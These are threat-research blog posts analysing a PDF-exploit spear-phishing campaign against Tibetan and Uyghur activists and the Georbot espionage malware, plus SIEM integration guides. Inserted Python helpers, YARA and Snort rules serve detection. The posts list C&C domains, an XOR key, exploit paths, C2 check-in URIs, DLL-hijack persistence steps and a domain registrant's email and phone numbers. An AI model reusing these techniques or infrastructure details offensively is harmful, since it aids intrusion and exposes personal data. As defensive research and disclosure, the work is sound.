AlienVault R&D Labs Portal. Get the latest news from our research.

Last month Adobe released a fix to patch a vulnerability that was being exploited in the wild. Kaspersky found that the 0day was being used by a very sophisticated group to target different governments using a malware called MiniDuke.

AlienVault Labs has detected that a different group of attackers has been using this vulnerability to target non-governmental and human rights organizations.

Together with our partner Kaspersky Labs we are releasing an analysis of this campaign. You can read their report here.

Based on the samples we found, we believe this group has been running a spear-phishing campaign for the last few weeks. The files we have analyzed are PDF files that contain code to exploit CVE-2013-0640. Once the victim opens the file, the system gets infected and a lure document is displayed to the victim. Some of the PDF lures we have found are:

[Screenshots: PDF lure documents]

Some of the exploit filenames:

  • 2013-Yilliq Noruz Bayram Merikisige Teklip.pdf
  • 联名信.pdf
  • arp.pdf

Based on the lures we found, it seems the same group is targeting both Tibetan and Uyghur activists in the same campaign.

The JavaScript code inside the PDF files is very similar to the one found in the Itaduke samples, but some of the initial variables and the obfuscation have been removed from the original.

The shellcode will create the file AcroRd32.exe in the Temp folder. That file decrypts an encrypted block using XOR operations with the key “0l23kj@nboxu”.
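The post says the dropped AcroRd32.exe unwraps its encrypted block with XOR operations using the key "0l23kj@nboxu". The following is an added example (not code from the post) of how an analyst would recover such a block offline: it assumes a plain repeating-key XOR, which the post does not state explicitly, and validates the result by checking for a well-formed PE header instead of trusting the key blindly. The "encrypted block" is constructed inside the script.

```python
"""Repeating-key XOR unwrapping of an embedded payload, with a PE sanity check.

Added example, not code from the AlienVault post. ASSUMPTION: the dropper's
"XOR operations with the key" are a plain repeating-key XOR. The ciphertext
below is constructed here, not a real sample.
"""
import struct
from typing import Optional

KEY = b"0l23kj@nboxu"  # key quoted in the post


def xor_with_key(data: bytes, key: bytes = KEY) -> bytes:
    """XOR every byte with the key byte at the same position modulo len(key).
    The operation is its own inverse, so it both wraps and unwraps."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def build_fake_pe() -> bytes:
    """Constructed minimal PE-shaped blob: just the headers looks_like_pe inspects."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: NT header follows the DOS header
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 20


def recover_payload(blob: bytes, key: bytes = KEY) -> Optional[bytes]:
    """Unwrap blob with key; return the plaintext only if it is PE-shaped, else None.
    A wrong key yields garbage that fails the MZ/PE check, so the caller learns
    whether the key (and the XOR assumption) actually fit the sample."""
    plain = xor_with_key(blob, key)
    return plain if looks_like_pe(plain) else None


if __name__ == "__main__":
    encrypted = xor_with_key(build_fake_pe())  # constructed stand-in for the encrypted block
    print("ciphertext starts with MZ?", encrypted[:2] == b"MZ")
    print("recovered a PE with the post's key?", recover_payload(encrypted) is not None)
    print("recovered a PE with a wrong key?", recover_payload(encrypted, b"wrongkey") is not None)
```

On a real dropper you would carve the encrypted region out of AcroRd32.exe and feed it to `recover_payload`; if the check fails, the scheme is not a simple repeating-key XOR and the decryption routine needs to be read from the disassembly instead.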

The malicious payload will perform the following operations:

- Copy \WINDOWS\system32\wuauclt.exe to %APPDATA%\wuauclt\wuauclt.exe
- Drop a malicious DLL under %APPDATA%\wuauclt\clbcatq.dll
- Execute %APPDATA%\wuauclt\wuauclt.exe

Note that wuauclt.exe is a benign system executable. Once the system file is executed, the malicious DLL will be loaded. This technique is known as DLL search order hijacking.
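The staging described above (a byte-identical copy of a signed system executable dropped into a user-writable folder next to a DLL that carries a system DLL's name) is something a responder can hunt for on disk. The script below is an added example, not code from the post: it walks a directory tree, pairs every executable with any DLL in the same folder whose name is on a watch list, and hashes the executable against its System32 namesake so the wuauclt.exe copy is flagged explicitly. The watch list of DLL names and the temporary directory layout are constructed for the demo.

```python
"""Hunt for DLL search-order hijacking staging: a copy of a system executable
in a user-writable directory next to a DLL bearing a system DLL name.

Added example, not the post's code. The names wuauclt.exe / clbcatq.dll come
from the post; the watch list and the hash comparison are this example's own
additions, and the directory tree is constructed in a temporary folder.
"""
import hashlib
import os
import tempfile
from pathlib import Path
from typing import List, Tuple

# ASSUMPTION: names of DLLs an application expects to resolve from System32.
SYSTEM_DLL_NAMES = {"clbcatq.dll", "mswsock.dll", "version.dll"}


def sha256(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def find_sideload_candidates(root: Path, system_dir: Path,
                             dll_names=SYSTEM_DLL_NAMES) -> List[Tuple[str, str, bool]]:
    """Walk root and return (exe_path, dll_path, exe_is_copy_of_system_binary)
    for every directory holding an .exe together with a watch-listed DLL.
    A same-named DLL beside the executable wins the search order over the
    System32 copy, which is exactly the trick the post describes."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        lower = {f.lower(): f for f in files}
        exes = [f for f in lower if f.endswith(".exe")]
        dlls = [f for f in lower if f in dll_names]
        for exe in exes:
            for dll in dlls:
                exe_path = Path(dirpath, lower[exe])
                sys_copy = system_dir / lower[exe]
                is_copy = sys_copy.is_file() and sha256(sys_copy) == sha256(exe_path)
                findings.append((str(exe_path), str(Path(dirpath, lower[dll])), is_copy))
    return findings


def build_demo_tree(base: Path) -> Tuple[Path, Path]:
    """Constructed layout: a fake system32 holding 'wuauclt.exe', an APPDATA folder
    with a copy of it plus a rogue clbcatq.dll, and a benign app with its own
    helper DLL that must not be flagged."""
    sys32 = base / "Windows" / "system32"
    appdata = base / "AppData" / "Roaming"
    sys32.mkdir(parents=True)
    (appdata / "wuauclt").mkdir(parents=True)
    (appdata / "someapp").mkdir(parents=True)
    (sys32 / "wuauclt.exe").write_bytes(b"MZ-fake-wuauclt")
    (appdata / "wuauclt" / "wuauclt.exe").write_bytes(b"MZ-fake-wuauclt")
    (appdata / "wuauclt" / "clbcatq.dll").write_bytes(b"MZ-rogue-dll")
    (appdata / "someapp" / "app.exe").write_bytes(b"MZ-app")
    (appdata / "someapp" / "helper.dll").write_bytes(b"MZ-helper")
    return appdata, sys32


def run_demo() -> List[Tuple[str, str, bool]]:
    with tempfile.TemporaryDirectory() as tmp:
        appdata, sys32 = build_demo_tree(Path(tmp))
        return find_sideload_candidates(appdata, sys32)


if __name__ == "__main__":
    for exe, dll, is_copy in run_demo():
        print(f"{exe}\n  loads {dll}\n  exe is a copy of the System32 binary: {is_copy}")
```

On a live Windows host you would point `root` at `%APPDATA%` (or the whole user profile) and `system_dir` at `C:\Windows\System32`; a hit where `is_copy` is true is a signed, legitimate binary being abused as a loader, so the DLL next to it is the file to collect.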

The malicious DLL is loaded when wuauclt.exe is executed. Note that the malicious clbcatq.dll does not export all the functions the original clbcatq.dll has; it only implements the ones required to run the malicious code:

[Screenshot: export tables of the original clbcatq.dll (left) and the malicious clbcatq.dll (right)]

Once the malicious DLL is loaded, the malicious code will generate the following HTTP request:

[Screenshot: HTTP request generated by the malicious DLL]

The server will reply with an encrypted block of code that will be decrypted. The decrypted content is actually a DLL that exports the following functions:

  • GetWorkType
  • InfectFile

The payload will drop the following files:

  • \WINDOWS\system32\wbem\4BA5E980.PBK
  • \WINDOWS\system32\wbem\mstd32.dll

The InfectFile function will modify some code in the system library WINDOWS\system32\mswsock.dll. If we take a look at the patched DLL:

Original version:

[Screenshot: original mswsock.dll]

Modified version:

[Screenshot: patched mswsock.dll]

If we take a look at WSPStartup_0:

[Screenshot: disassembly of WSPStartup_0]

We can see how the malicious DLL mstd32.dll will be loaded every time the system library mswsock.dll is loaded by a program.

The file mstd32.dll is signed using a certificate issued to “YNK JAPAN Inc.” We have seen that certificate being used to sign malware dropped in several NGO attacks in the past.

[Screenshot: code-signing certificate issued to YNK JAPAN Inc.]

Then the malicious code will perform the following HTTP request every few seconds:

[Screenshot: periodic HTTP request]

The final payload is detected as Trojan.Win32.Swisyn and it has a lot of functionality to monitor and steal data from the infected system.

We have identified the following C&C servers for both payloads:

  • ly.micorsofts.net
  • ip.micrsofts.com
  • xdx.hotmal1.com
  • hy.micrsofts.com

All the DNS names are pointing to 60.211.253.28 at this time.

Both domains have been registered using the same mail address:

micorsofts.net

Created: 2008-05-12 01:51:10
Expires: 2013-05-12 01:51:10
Last Modified: 2012-05-02 13:26:38

Registrant Contact:
GW SY
li wen li wen (lcb_jn@sina.com)
zq dj
jiningshi, shandongsheng, cn 272000
P: +86.05372178000 F: +86.05372178000

hotmal1.com

Created: 2008-12-30 03:53:18
Expires: 2013-12-30 03:53:18
Last Modified: 2012-12-26 15:32:15

Registrant Contact:
GW SY
li wen li wen (lcb_jn@sina.com)
zq dj
shixiaqu, beijingshi, cn 272000
P: +86.02227238836601 F: +86.02227238836601

Profile of the user on 20cn.net

We (AlienVault Labs) have written some Snort rules to match the network behavior:

[Screenshot: Snort rules]

You can use the following Yara rule to match the malicious binaries:

[Screenshot: Yara rule for the malicious binaries]

And this one to detect the malicious PDF files:

[Screenshot: Yara rule for the malicious PDF files]

Finally, we are releasing some OpenIOC indicators as well:

[Screenshot: OpenIOC indicators]

You can find all the content in our GitHub repository.

The rules have been included in the EmergingThreats ruleset as well as in our Open Source SIEM.

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

A few days ago, CERT-Georgia published a great report describing a cyber espionage campaign. ESET wrote a great report a few months ago as well. The report said the malware was found in Georgian Governmental Agencies including ministries, parliament, banks and NGOs. The report also says the purpose of the malware was “Collecting Sensitive, Confidential Information about Georgian and American Security Documents” and it establishes a connection with Russian Official Security Agencies.

In this blog post we will offer a brief overview of the infection vectors as well as the malware behavior, and we will share some IOCs and signatures to detect the presence of the malware in your systems.

Infection method

To compromise the victims, the attackers placed JavaScript code or iframes into websites, leading to exploit code.

The compromised websites include Georgian Government servers like ema.gov.ge. Other examples are:

- ema.gov.ge
- 31.214.140.214
- 178.32.91.70
- georgiaonline.xp3.biz
- 31.31.75.63
- 173.212.192.83

An example of the malicious JavaScript is as follows:

[Screenshot: injected JavaScript]

The malicious JavaScript present in frame.js/frame.php includes code that exploits several vulnerabilities including CVE-2010-0842, CVE-2006-3730, MS06-057 and some Java exploits.

Examples of exploit code found:

178.32.91.70 [/] modules[/]docs[/]newexp[.]jar
https://www.virustotal.com/file/9bf88bf15ffa6888ec2a3bd9e8dc6d13b650f1122ca69cface9ccf777c32e259/analysis/

178.32.91.70 [/] modules[/]docs[/]Java-2010-0842[.]jar
https://www.virustotal.com/file/7a900cc7616cfbf2ca17350c436af2490621550ded3e29325dc31149db50c63d/analysis/

Once the exploit code is executed, the payload calc.exe that contains the malware is downloaded from the remote server.

The malware uses a custom packer to evade security products. It also uses obfuscation to hide both the configuration values and the API calls.

The malware uses byte subtraction operations to hide the strings, including the configuration values:

[Screenshot: obfuscated strings]

After deobfuscation:

[Screenshot: deobfuscated strings]

We can use the following Yara rule to detect the obfuscated binary:

rule GeorBotBinary
{
    strings:
        // "cr" ?? "_0" 00 "kernel32.dll": one byte is wildcarded with ??
        $a = {63 72 ?? 5F 30 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C}

    condition:
        all of them
}

Based on the deobfuscated strings we can also write a Yara rule to detect the presence of the malware in memory:

rule GeorBotMemory
{
    strings:
        // "SOFTWARE\" 00 "Microsoft\" 00 "Windows\CurrentVersion\" 00 "Run" 00 "USBSERV":
        // the persistence registry key and value name
        $a = {53 4F 46 54 57 41 52 45 5C 00 4D 69 63 72 6F 73 6F 66 74 5C 00 57 69 6E 64 6F 77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 00 52 75 6E 00 55 53 42 53 45 52 56}
        // "system32\usbserv.exe": path of the executable the malware drops
        $b = {73 79 73 74 65 6D 33 32 5C 75 73 62 73 65 72 76 2E 65 78 65}
        // "\usbserv.exe"
        $c = {5C 75 73 62 73 65 72 76 2E 65 78 65}

    condition:
        $a and ($b or $c)
}

We use both the registry key used to maintain persistence and the executable name that the malware creates on the system (in version >=5 of the malware those values are stored as wide strings).

If we have a memory image of a system we can use Volatility to look for processes matching our Yara rule:

$ python vol.py -f /Users/jaime/tmp/geor.img yarascan -y GeorBotMemory.yara
Volatile Systems Volatility Framework 2.1_alpha

Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004055b3 53 4f 46 54 57 41 52 45 5c 00 4d 69 63 72 6f 73 SOFTWARE\.Micros
0x004055c3 6f 66 74 5c 00 57 69 6e 64 6f 77 73 5c 43 75 72 oft\.Windows\Cur
0x004055d3 72 65 6e 74 56 65 72 73 69 6f 6e 5c 00 52 75 6e rentVersion\.Run
0x004055e3 00 55 53 42 53 45 52 56 00 2e 64 6f 63 00 2e 78 .USBSERV..doc..x
Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004059a6 73 79 73 74 65 6d 33 32 5c 75 73 62 73 65 72 76 system32\usbserv
0x004059b6 2e 65 78 65 00 43 3a 5c 57 49 4e 44 4f 57 53 5c .exe.C:\WINDOWS\
0x004059c6 73 79 73 74 65 6d 33 32 5c 75 73 62 63 6c 69 65 system32\usbclie
0x004059d6 6e 74 2e 65 78 65 00 43 3a 5c 57 49 4e 44 4f 57 nt.exe.C:\WINDOW
Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004059ae 5c 75 73 62 73 65 72 76 2e 65 78 65 00 43 3a 5c \usbserv.exe.C:\
0x004059be 57 49 4e 44 4f 57 53 5c 73 79 73 74 65 6d 33 32 WINDOWS\system32
0x004059ce 5c 75 73 62 63 6c 69 65 6e 74 2e 65 78 65 00 43 \usbclient.exe.C
0x004059de 3a 5c 57 49 4e 44 4f 57 53 5c 73 79 73 74 65 6d :\WINDOWS\system
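To make the two Yara rules above and the yarascan run concrete, here is an added example (not the post's code, and not Yara itself; use yara-python or Volatility's yarascan for real work) of a tiny hex-pattern matcher: it translates the `{..}` hex strings, including the `??` wildcard, into byte regexes, evaluates the rules' conditions, and sweeps a constructed "process memory" buffer holding the same persistence strings the yarascan output shows. Offsets are reported relative to an optional base so they can be compared with the addresses in the output above.

```python
"""Tiny YARA-style hex matcher showing what the GeorBotBinary / GeorBotMemory
patterns match and how a yarascan-like sweep works.

Added example, not the post's code and not YARA. The memory buffer is
constructed below so the script runs offline.
"""
import re


def hex_pattern_to_regex(pattern: str) -> re.Pattern:
    """Translate a YARA hex string such as '{63 72 ?? 5F}' into a bytes regex:
    each 'xx' becomes a literal byte, '??' becomes any single byte."""
    parts = []
    for tok in pattern.strip("{} ").split():
        if tok == "??":
            parts.append(b".")
        elif re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
            parts.append(re.escape(bytes([int(tok, 16)])))
        else:
            raise ValueError(f"unsupported token {tok!r}")
    return re.compile(b"".join(parts), re.DOTALL)


# The two rules from the post, with their conditions written as predicates over
# {string_id: [match offsets]}.
RULES = {
    "GeorBotBinary": {
        "strings": {"$a": "{63 72 ?? 5F 30 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C}"},
        "condition": lambda m: bool(m["$a"]),  # all of them (only one string)
    },
    "GeorBotMemory": {
        "strings": {
            "$a": "{53 4F 46 54 57 41 52 45 5C 00 4D 69 63 72 6F 73 6F 66 74 5C 00 57 69 6E 64 6F "
                  "77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 00 52 75 6E 00 55 53 42 53 45 52 56}",
            "$b": "{73 79 73 74 65 6D 33 32 5C 75 73 62 73 65 72 76 2E 65 78 65}",
            "$c": "{5C 75 73 62 73 65 72 76 2E 65 78 65}",
        },
        "condition": lambda m: bool(m["$a"]) and (bool(m["$b"]) or bool(m["$c"])),
    },
}


def scan(buf: bytes, base: int = 0) -> dict:
    """Return {rule_name: {string_id: [offsets]}} for the rules whose condition holds.
    base is added to every offset (e.g. the image base of the scanned region)."""
    hits = {}
    for name, rule in RULES.items():
        matches = {}
        for sid, pat in rule["strings"].items():
            matches[sid] = [base + m.start() for m in hex_pattern_to_regex(pat).finditer(buf)]
        if rule["condition"](matches):
            hits[name] = {sid: offs for sid, offs in matches.items() if offs}
    return hits


# Constructed process memory: the persistence strings as seen in the post's
# yarascan output, with filler so the offsets are non-trivial.
DEMO_MEMORY = (
    b"\x00" * 0x20
    + b"SOFTWARE\\\x00Microsoft\\\x00Windows\\CurrentVersion\\\x00Run\x00USBSERV\x00.doc\x00"
    + b"\x90" * 0x10
    + b"C:\\WINDOWS\\system32\\usbserv.exe\x00C:\\WINDOWS\\system32\\usbclient.exe\x00"
)

if __name__ == "__main__":
    for rule, strings in scan(DEMO_MEMORY, base=0x400000).items():
        print("Rule:", rule)
        for sid, offs in strings.items():
            print(f"  {sid} at", ", ".join(hex(o) for o in offs))
```

Note that `GeorBotMemory` only fires when `$a` is present together with `$b` or `$c`; a buffer that contains just the registry path does not match, which is what keeps the rule from firing on every process that merely references the Run key.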

Network traffic

The malware uses HTTP to communicate with the C&C server. It contains several commands to upload and retrieve information from the victim. It also looks for malware updates every once in a while. In early versions the update was requested from /modules/docs/upload/calc.exe on the C&C server.

[Screenshot: update request for /modules/docs/upload/calc.exe]

In newer versions the malware performs a request to /calc.php and the server sends base64-encoded content (this can be done using content from different servers at the same time).

[Screenshot: /calc.php request and base64-encoded response]

When the malware starts it sends the following request to the C&C:

[Screenshot: initial check-in request]

Every minute it sends the following HTTP request to the C&C to ask for instructions:

[Screenshot: periodic check-in request]

In newer versions the parameter “cam” was also introduced that tells the C&C whether the infected system has a webcam.

/index312.php?ver=5.1&cam=0&p=cert123&id=401acd00

You can use the following Snort rules to detect the presence of this malware in your network:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Georbot requesting update"; flow:to_server,established; content:"/modules/docs/upload/calc.exe"; http_uri; classtype:trojan-activity; sid:1111111112; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Georbot initial checkin"; flow:to_server,established; content:"POST"; http_method; nocase; content:".php?ver="; http_uri; content:"&p=cert123"; fast_pattern; http_uri; content:"&id="; http_uri; classtype:trojan-activity; sid:1111111113; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Georbot checkin"; flow:to_server,established; content:".php?ver="; http_uri; content:"&p=bot123"; fast_pattern; http_uri; content:"&id="; http_uri; classtype:trojan-activity; sid:1111111114; rev:1;)

Emerging Threats Pro has coverage for previous versions (see “ETPRO TROJAN TDSS.xcn”) but the rules I posted will work with newer versions of the malware as well.
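The same three detections can be applied after the fact to proxy or web-server logs. The script below is an added example (not the post's code) that mirrors the Snort rules above in Python: it parses HTTP request lines, applies the method and URI-substring conditions of each rule, and pulls the ver/cam/p/id fields out of a check-in URI for enrichment. The log lines are constructed; the URI fragments are the ones the rules use. Note the last sample line: a cert123 check-in sent with GET does not fire, because the initial-checkin rule requires POST, which is worth knowing before relying on that rule alone.

```python
"""Georbot C&C check-in detection in Python, mirroring the three Snort rules.

Added example, not the post's code. The request lines are constructed here;
the URI fragments (/modules/docs/upload/calc.exe, .php?ver=, &p=cert123,
&p=bot123, &id=) come from the post's rules.
"""
from urllib.parse import parse_qs, urlsplit

# (message, required HTTP method or None, URI substrings that must all be present)
SIGNATURES = [
    ("ET MALWARE Georbot requesting update", None, ["/modules/docs/upload/calc.exe"]),
    ("ET MALWARE Georbot initial checkin", "POST", [".php?ver=", "&p=cert123", "&id="]),
    ("ET MALWARE Georbot checkin", None, [".php?ver=", "&p=bot123", "&id="]),
]


def parse_request_line(line: str):
    """Split 'METHOD URI HTTP/x.y' into (method, uri); return None if malformed."""
    parts = line.strip().split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    return parts[0], parts[1]


def match_signatures(method: str, uri: str):
    """Messages of every signature whose method (if required) and URI substrings match."""
    return [
        msg for msg, want_method, needles in SIGNATURES
        if (want_method is None or method.upper() == want_method)
        and all(n in uri for n in needles)
    ]


def checkin_fields(uri: str) -> dict:
    """Extract ver/cam/p/id from a check-in URI (cam is absent in older versions)."""
    q = parse_qs(urlsplit(uri).query)
    return {k: q[k][0] for k in ("ver", "cam", "p", "id") if k in q}


def scan_log(lines):
    """Apply the signatures to each request line; return a list of hit records."""
    hits = []
    for line in lines:
        parsed = parse_request_line(line)
        if not parsed:
            continue
        method, uri = parsed
        for msg in match_signatures(method, uri):
            hits.append({"msg": msg, "uri": uri, "fields": checkin_fields(uri)})
    return hits


# Constructed log: request lines only, one benign and four Georbot-style.
SAMPLE_LOG = [
    "GET /index.html HTTP/1.1",
    "GET /modules/docs/upload/calc.exe HTTP/1.1",
    "POST /index312.php?ver=5.1&cam=0&p=cert123&id=401acd00 HTTP/1.1",
    "GET /index312.php?ver=5.1&cam=0&p=bot123&id=401acd00 HTTP/1.1",
    "GET /index312.php?ver=5.1&cam=0&p=cert123&id=401acd00 HTTP/1.1",  # GET: initial-checkin rule needs POST
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["msg"], hit["uri"], hit["fields"])
```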

Based on the behavior of the malware we wrote this OpenIOC rule:

[Screenshot: OpenIOC rule]

You can download all the content from this blog post on the following url:

https://github.com/jaimeblasco/AlienvaultLabs/tree/master/malware_analysis/Georbot

Happy Halloween!

jaime.blasco

When we launched the Open Threat Exchange (OTX) project, one of our goals was creating an open and free threat database and exchange system. We want it to be used by as many users as possible using a wide range of technologies.

That is why we are publishing some code to feed our Open Threat Exchange (OTX) data to an ArcSight SIEM using the Common Event Format via Syslog.

The Open Threat Exchange (OTX) contains an IP reputation database that offers real-time information on bad actors. Using this information within a SIEM gives you new possibilities to correlate data, for example:

  • Connection to known C&C servers
  • Detection of P2P botnets
  • Data exfiltration to low reputation servers
  • Password guessing attacks from bad actors
  • Exploit/Malware access from malicious servers

Download the required files:

The configuration is very easy; just open the configuration file config_otx.py:

[main]
syslog_level = notice
syslog_facility = daemon
syslog_host = 10.49.5.139
reputation_server = https://reputation.alienvault.com/
syslog_port = 514
revision = 0

[fields]
min_reliability = 2
min_priority = 2
ignore_activities =

[proxy]
enable = False
host =
user =
password =
port =

Configure your collector IP address on syslog_host and you are ready to go. The script will download the reputation data from our servers (HTTP) and it will send that data to the collector using UDP.

Then you need to create an Active List in ArcSight to use the indicators.

If you need to access the Internet via a proxy, configure it under the proxy section.

Using this method, our reputation data is updated on an hourly basis, so you can configure a cron job to execute the script once an hour.

You can also configure some filters. If you want to ignore some of the activities we send, you can use this syntax:

ignore_activities = Scanning Host,Spamming

min_reliability is the minimum reliability value that will be sent to the collector, based on the reliability that OTX assigns to that IP address. The same applies to min_priority: it is the minimum priority value for the information to be sent.

$ python otx-arcsight.py
Server data rev is 14694
Local rev is 14694

This means the database is up to date.

$ python otx-arcsight.py
Server data rev is 14694
Local rev is 14691
Updating data from server
Downloading complete database
Sending CEF:0|AlienvaultOTX|AlienvaultOTX|1.0|100|Suspicious Host|1|src=94.248.192.110 msg=Scanning Host,http://labs.alienvault.com/labs/index.php/projects/open-source-ip-reputation-portal/information-about-ip/?ip\=94.248.192.110
Sending CEF:0|AlienvaultOTX|AlienvaultOTX|1.0|100|Suspicious Host|1|src=94.248.192.112 msg=Scanning Host,http://labs.alienvault.com/labs/index.php/projects/open-source-ip-reputation-portal/information-about-ip/?ip\=94.248.192.112
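To show what the script's filtering and output stage amounts to, here is an added example (not the otx-arcsight.py script itself) that applies the min_reliability, min_priority and ignore_activities settings to a set of constructed reputation records and renders each survivor as a CEF line in the format shown in the output above, including the `\=` escaping of the portal URL. The record field names (ip, reliability, priority, activities) are assumptions, as is the ignore semantics (ignored activities are dropped from a record, and the record is skipped only if nothing remains). Sending is done with a plain UDP syslog datagram, like the config's syslog_host/syslog_port.

```python
"""OTX-style reputation records -> CEF events with threshold and activity filters.

Added example, not the AlienVault script. Records are constructed; their field
names and the ignore_activities semantics are assumptions of this example.
"""
import socket
from typing import Iterable, List

CEF_HEADER = "CEF:0|AlienvaultOTX|AlienvaultOTX|1.0|100|Suspicious Host|1|"
PORTAL = ("http://labs.alienvault.com/labs/index.php/projects/"
          "open-source-ip-reputation-portal/information-about-ip/")


def cef_escape_extension(value: str) -> str:
    """CEF extension values must escape backslash, '=' and line breaks; the '\\='
    in the post's output is this escaping applied to the '?ip=' in the URL."""
    return (value.replace("\\", "\\\\").replace("=", "\\=")
            .replace("\r", "\\r").replace("\n", "\\n"))


def to_cef(record: dict, portal_url: str = PORTAL) -> str:
    """One CEF line: src is the IP, msg carries the activity list and a portal link."""
    ip = record["ip"]
    msg = ",".join(record["activities"]) + "," + f"{portal_url}?ip={ip}"
    return f"{CEF_HEADER}src={ip} msg={cef_escape_extension(msg)}"


def select_records(records: Iterable[dict], min_reliability: int, min_priority: int,
                   ignore_activities: Iterable[str]) -> List[dict]:
    """Keep records at or above both thresholds; strip ignored activities and drop
    a record whose activities are all ignored (ASSUMPTION: semantics of the filter)."""
    ignored = {a.strip() for a in ignore_activities if a.strip()}
    kept = []
    for rec in records:
        if rec["reliability"] < min_reliability or rec["priority"] < min_priority:
            continue
        remaining = [a for a in rec["activities"] if a not in ignored]
        if not remaining:
            continue
        kept.append({**rec, "activities": remaining})
    return kept


def send_syslog(lines: Iterable[str], host: str, port: int = 514,
                facility: int = 3, severity: int = 5) -> int:
    """Send each line as a UDP syslog datagram (facility daemon=3, severity notice=5,
    matching syslog_facility/syslog_level in the config). Returns lines sent."""
    pri = facility * 8 + severity
    n = 0
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        for line in lines:
            s.sendto(f"<{pri}>{line}".encode(), (host, port))
            n += 1
    return n


# Constructed records: two scanners, one below min_reliability, one with only an
# ignored activity.
DEMO_RECORDS = [
    {"ip": "94.248.192.110", "reliability": 4, "priority": 2, "activities": ["Scanning Host"]},
    {"ip": "94.248.192.112", "reliability": 4, "priority": 2, "activities": ["Scanning Host", "Malicious Host"]},
    {"ip": "198.51.100.7", "reliability": 1, "priority": 2, "activities": ["Spamming"]},
    {"ip": "203.0.113.9", "reliability": 3, "priority": 3, "activities": ["Spamming"]},
]


def build_events(records=DEMO_RECORDS, min_reliability: int = 2, min_priority: int = 2,
                 ignore_activities=("Spamming",)) -> List[str]:
    return [to_cef(r) for r in select_records(records, min_reliability, min_priority, ignore_activities)]


if __name__ == "__main__":
    for line in build_events():
        print("Sending", line)
    # send_syslog(build_events(), host="10.49.5.139")  # collector from config_otx.py
```

The ignore list is parsed exactly as the config shows it (comma-separated, whitespace tolerated), and the facility/severity numbers are the standard syslog values for daemon/notice, so the PRI field the collector sees is `<29>`.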

 

jaime.blasco

Today we are launching the new AlienVault OSSIM v4.0.

You can download it from here.

Apart from tons of new features, we have improved the correlation engine capabilities, two of the most impressive features are:

- Taxonomy correlation based on the Category and Subcategory of the events.
- Correlation using the Open Threat Exchange (OTX) data.

The correlation directives editor has been improved so you won’t need an XML editor anymore (in theory :D).

I will share with you a couple of basic examples that will teach you how to use the new interface to build correlation rules using these new features.

Example 1: Outbound FTP connection to an external server marked as suspicious

In this example we will see how to detect outbound FTP connections to an external server that is listed in the Open Threat Exchange, which indicates it may be a malicious or hacked server to which data is being exfiltrated.

To create a new correlation rule click on Intelligence->Correlation Directives and then on the button “Add Directive”:

[Screenshot: Add Directive button]

Set the priority to 5:

[Screenshot: priority set to 5]

And create the rule for the first level (the correlation directive will have only one level):

[Screenshot: first rule level]

Then select the Taxonomy radio button and set the product type to Firewall:

[Screenshot: product type set to Firewall]

On the next window, select the Taxonomy radio button once again and set the category to Network and the subcategory to FTP_activity:

[Screenshot: category Network, subcategory FTP_activity]

The next window is used to set the source and destination conditions. For the Source we will click on HOME_NET, which means the correlation rule will match on events that have a source address belonging to the local networks we have defined in the system. For the destination click on !HOME_NET, which will match on destination addresses that are outside our network. Click also on Reputation options and set “Reputation to” to yes. It will match on destination addresses that are marked as suspicious in the Open Threat Exchange data.

[Screenshot: source, destination and reputation conditions]

For the next windows you can leave the default values.

Once you create the correlation directive you have to perform one last step, because of a small bug in the web interface. Go to Intelligence->Correlation Directives and, in the User category, click on “Edit XML directive file”:

[Screenshot: Edit XML directive file]

As you can see in the following screenshot, add type="detector" to the rule level of the XML file:

[Screenshot: type="detector" added to the rule element of the XML directive]

Finally click on Restart Server and your correlation rule will be loaded on the system.

Below you can see an example of the correlation rule firing:

[Screenshot: alarm generated by the correlation rule]

If you click on the details, you will see that the alarm has been fired using an event from a Cisco PIX Firewall:

[Screenshot: alarm details showing the Cisco PIX Firewall event]

This correlation rule is very useful to detect information being leaked to external servers by malware or intruders.

 

Example 2: SQL injection followed by error 500 on the web server

In this example we will see how to detect potential SQL injections against our web servers. The rule will detect an SQL injection attack reported by an Intrusion Detection System (IDS), followed by an error 500 on the destination web server, which indicates that an error occurred in the web application.

Let’s create a new directive:

[Screenshots: creating the new directive and its first rule level]

Leave the default values for the next windows.

Then edit your recently created directive and add a new rule level:

[Screenshots: adding the second rule level]

On the next screen you have to set the option Source to “From a parent rule: Source IP from level 1” and Destination to “From a parent rule: Destination IP from level 1”, which means the source and destination should match the values seen in the first level we created.

[Screenshot: source and destination taken from level 1]

Set the number of occurrences to 1:

[Screenshot: occurrences set to 1]

The timeout to 10 seconds:

[Screenshot: timeout set to 10 seconds]

And the reliability to 8:

[Screenshot: reliability set to 8]

